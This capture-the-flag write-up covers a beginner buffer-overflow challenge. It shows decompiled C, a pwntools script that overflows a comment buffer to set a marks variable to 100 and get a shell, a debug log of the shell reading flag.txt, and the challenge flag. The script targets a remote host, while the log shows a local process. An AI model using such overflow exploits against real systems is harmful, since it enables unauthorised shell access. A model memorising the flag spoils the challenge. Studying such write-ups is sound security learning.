Tags: bufferoverflow
Rating:
# Marks
We were given a [binary](https://gr007.tech/writeups/2023/backdoor/beginner/marks/chal) file that is supposed to show us our marks given our name and roll. Let's load it up in ghidra:
```c
undefined8 main(void)
{
int r;
time_t tVar1;
long in_FS_OFFSET;
undefined name [32];
char buf [64];
int roll;
uint m;
long local_10;
local_10 = *(in_FS_OFFSET + 0x28);
tVar1 = time(0x0);
srand(tVar1);
puts("Enter your details to view your marks ...");
printf("Roll Number : ");
__isoc99_scanf("%d",&roll);
printf("Name : ");
__isoc99_scanf("%s",name);
puts("Please Wait ...\n");
usleep(1000000);
r = rand();
m = r % 75;
printf("You got %d marks out of 100\n",m);
puts("Any Comments ?");
__isoc99_scanf("%s",buf);
puts("Thanks !");
if (m == 100) {
puts("Cool ! Here is your shell !");
system("/bin/sh");
}
else {
puts("Next time get 100/100 marks for shell :)");
}
if (local_10 != *(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
```
The goal here is to get 100 marks but as we can see, the highest we can get is 74. So, we have to overflow our comment buffer into the m variable in our stack.
Once you get where our m variable is in the stack, it is pretty easy to write an exploit that will overflow our buf buffer into the marks m variable.
Here is my solution:
```python
#!/usr/bin/env python
from pwn import *
context.log_level = "debug"
# p = process("./chal")
p = remote("34.70.212.151", 8004)
p.recv()
p.sendline(b"123")
p.recv()
p.sendline(b"whoami")
p.recv()
pay = b"a" * 68 + p64(100)
p.sendline(pay)
p.interactive()
p.close()
```
```sh
backdoor/beginner/marks on master [!?] via ? v3.11.6
❯ ./sol.py
[+] Starting local process './chal' argv=[b'./chal'] : pid 118111
[DEBUG] Received 0x38 bytes:
b'Enter your details to view your marks ...\n'
b'Roll Number : '
[DEBUG] Sent 0x4 bytes:
b'123\n'
[DEBUG] Received 0x7 bytes:
b'Name : '
[DEBUG] Sent 0x7 bytes:
b'whoami\n'
[DEBUG] Received 0x11 bytes:
b'Please Wait ...\n'
b'\n'
[DEBUG] Sent 0x4d bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
00000040 61 61 61 61 64 00 00 00 00 00 00 00 0a │aaaa│d···│····│·│
0000004d
[*] Switching to interactive mode
[DEBUG] Received 0x50 bytes:
b'You got 21 marks out of 100\n'
b'Any Comments ?\n'
b'Thanks !\n'
b'Cool ! Here is your shell !\n'
You got 21 marks out of 100
Any Comments ?
Thanks !
Cool ! Here is your shell !
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x16 bytes:
b'chal flag.txt\n'
chal flag.txt
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
b'cat flag.txt\n'
[DEBUG] Received 0x25 bytes:
b'flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}\n'
flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}
```
flag: `flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}`
